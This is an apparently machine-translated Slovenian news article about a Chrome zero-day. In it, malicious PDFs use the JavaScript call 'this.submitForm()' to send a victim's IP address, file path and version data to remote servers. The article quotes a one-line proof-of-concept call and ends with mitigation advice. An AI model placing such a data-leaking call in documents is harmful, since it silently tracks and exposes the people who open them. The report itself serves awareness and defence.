Služba za odkrivanje izkoriščanja EdgeSpot je odkril intrigantno Chromovo ranljivost brez vsakršnega dne, ki izkorišča dokumente PDF. Ranljivost omogoča, da napadalci pridobivajo občutljive podatke s pomočjo zlonamernih dokumentov PDF, odprtih v Chromu.

Takoj, ko žrtev v Google Chromu odpre ustrezne datoteke PDF, v ozadju začne zlonamerni program z zbiranjem uporabniških podatkov.

Podatki se nato posredujejo na oddaljeni strežnik, ki ga nadzirajo hekerji. Morda se sprašujete, kateri podatki napadajo napadalci, ciljajo na naslednje podatke v računalniku:

• IP naslov
• Celotna pot datoteke PDF v sistemu
• Različice OS in Chrome

Pazite na datoteke z PDF zlonamerno programsko opremo

Morda boste presenečeni, ko veste, da se nič ne zgodi, ko Adobe Reader uporablja za odpiranje datotek PDF. Poleg tega se HTTP POST zahteve uporabljajo za prenos podatkov na oddaljene strežnike brez kakršnega koli posredovanja uporabnika.

Strokovnjaki so opazili, da je podatke prejemala eno od dveh domen readnotifycom ali burpcollaboratornet.

Intenzivnost napada si lahko predstavljate, če upoštevate dejstvo, da večina protivirusne programske opreme ne more zaznati vzorcev, ki jih zazna EdgeSpot.

Strokovnjaki razkrivajo, da napadalci uporabljajo Javascript API PDF "this.submitForm ()" za zbiranje občutljivih informacij uporabnikov.

Preizkusili smo ga z minimalnim PoC-jem, s preprostim klicem API-ja, kot je "this.submitForm (" http://google.com/test ")", bo Google Chrome osebne podatke poslal na google.com.

Strokovnjaki so dejansko ugotovili, da ta hrošč v Chromu izkoriščata dva različna niza zlonamernih datotek PDF. Obe sta bili zaokroženi oktobra 2017 oziroma septembra 2018.

Zbrani podatki lahko napadalci uporabijo za natančno nastavitev napadov v prihodnosti. Poročila kažejo, da je bila prva serija datotek sestavljena s storitvijo za sledenje PDF ReadNotify.

Uporabniki lahko s pomočjo storitve spremljajo poglede uporabnikov. EdgeSpot ni delil nobenih podrobnosti glede narave drugega nabora datotek PDF.

Kako ostati zaščiten

Služba za odkrivanje Exploit EdgeSpot je želela uporabnike Chroma opozoriti na potencialna tveganja, ker se obliž ne pričakuje v bližnji prihodnosti.

EdgeSpot je lani o ranljivosti poročal Googlu, podjetje pa je obljubilo, da bo izdal obliž konec aprila. H

lahko pa začasno rešite težavo tako, da lokalno ogledate prejete dokumente PDF z alternativno aplikacijo za branje PDF.

Svoje dokumente PDF lahko v Chromu odprete tudi tako, da sisteme prekinete z internetom. Medtem lahko počakate na posodobitev za Chrome 74, ki bo predvidoma uvedena 23. aprila.